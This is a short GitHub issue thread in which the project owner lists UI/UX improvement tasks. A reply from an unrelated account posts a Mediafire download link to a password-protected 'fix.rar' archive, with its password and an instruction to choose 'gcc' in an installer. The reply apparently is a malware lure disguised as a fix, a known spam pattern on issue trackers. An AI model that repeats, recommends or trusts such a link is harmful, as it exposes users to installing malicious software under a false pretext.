### ISSUE TITLE
Issue 4: UI/UX Improvements

### ISSUE THREAD

**Issue by Djordje-Stojanovic** [Djordje-Stojanovic/Stojanovic-One#73]
Description: Enhance overall user interface and experience.
Tasks:
[ ] Review and update color scheme for better aesthetics
[ ] Improve responsive design for mobile devices
[ ] Add loading states and animations for better user feedback
[ ] Implement error handling and user-friendly error messages

**Comment by youngerwarrior** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."
